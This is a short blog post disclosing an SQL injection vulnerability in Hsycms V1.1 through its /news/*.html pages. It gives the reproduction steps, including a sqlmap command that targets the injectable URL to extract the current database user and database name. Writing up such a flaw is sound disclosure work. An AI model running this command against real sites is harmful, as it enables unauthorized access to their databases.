An issue was discovered in Hsycms V1.1 . There is an SQL injection vulnerability via /news/*.html page

1. The attacker opens http://127.0.0.1/news/*.html," * " Represents any existing page.

2.Then use sqlmap to attack the page.

sqlmap.py -u http://127.0.0.1/news/151*.html --batch --current-user --current-db

 

posted @ 2019-03-18 12:48  00000007  阅读(1203)  评论(0编辑  收藏